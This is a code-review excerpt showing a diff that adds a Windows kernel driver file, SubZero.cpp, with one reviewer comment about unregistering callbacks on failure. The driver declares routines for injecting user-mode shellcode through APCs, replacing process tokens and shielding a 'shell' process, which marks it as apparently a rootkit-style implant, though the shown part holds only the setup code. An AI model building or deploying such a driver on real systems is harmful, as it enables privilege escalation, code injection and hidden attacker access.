Project/SubZeroDriver/SubZero.cpp

```diff
@@ -0,0 +1,456 @@
+OB_PREOP_CALLBACK_STATUS OnPreOpenProcess(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info);
+void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo);
+void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create);
+void InjectUsermodeShellcodeAPC(unsigned char* Shellcode, SIZE_T ShellcodeSize);
+bool FindProcessByName(CHAR* Name, PEPROCESS* Process);
+bool QueueAPC(PKTHREAD thread, KPROCESSOR_MODE mode, PKNORMAL_ROUTINE apcFunction);
+void ReplaceToken(PEPROCESS Process, PACCESS_TOKEN Token);
+
+extern "C" NTSTATUS
+DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
+	KdPrint((DRIVER_PREFIX "[+] Driver was loaded\n"));
+
+	UNICODE_STRING altitude = RTL_CONSTANT_STRING(L"12345.6171");
+
+	// Build registration structures for shell Process' protection
+	OB_OPERATION_REGISTRATION operations[] = {
+		{
+			PsProcessType,		        // object type
+			OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
+			OnPreOpenProcess, nullptr	// pre, post
+		}
+	};
+	OB_CALLBACK_REGISTRATION reg = {
+		OB_FLT_REGISTRATION_VERSION,
+		1,										// operation count
+		altitude,		// altitude
+		nullptr,							    // context
+		operations
+	};
+
+	auto status = STATUS_SUCCESS;
+	PDEVICE_OBJECT DeviceObject = nullptr;
+	UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\" DRIVER_NAME);
+	UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\" DRIVER_NAME);
+	bool symLinkCreated = false;
+
+	do {
+		status = ::IoCreateDevice(DriverObject, 0, &devName,
+			FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to create device (status=0x%08X)\n",status));
+			break;
+		}
+		DeviceObject->Flags |= DO_DIRECT_IO;
+
+		status = ::IoCreateSymbolicLink(&symLink, &devName);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to create sym link (status=0x%08X)\n",status));
+			break;
+		}
+		symLinkCreated = true;
+
+		// Register for object notifications
+		status = ::ObRegisterCallbacks(&reg, &g_Globals.ObjectRegistrationHandle);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to register object callbacks (status=0x%08X)\n", status));
+			break;
+		}
+
+		status = ::CmRegisterCallbackEx(OnRegistryNotify, &altitude, DriverObject,
+			nullptr, &g_Globals.RegistryRegistrationCookie, nullptr);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "failed to set registry callback (%08X)\n",
+				status));
+			break;
+		}
+
+		// Register for Thread notifications
+		status = ::PsSetCreateThreadNotifyRoutine(OnThreadNotify);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to set Thread callbacks (status=status=%08X)\n", status));
+			break;
+		}
+	} while (false);
+	
+	if (!NT_SUCCESS(status)) {
+		if (symLinkCreated)
+			::IoDeleteSymbolicLink(&symLink);
+		if (DeviceObject)
+			::IoDeleteDevice(DeviceObject);
+	}
```

Comment:
Youe should also remove: `CmRegisterCallbackEx`, `PsSetCreateThreadNotifyRoutine` in case of failure.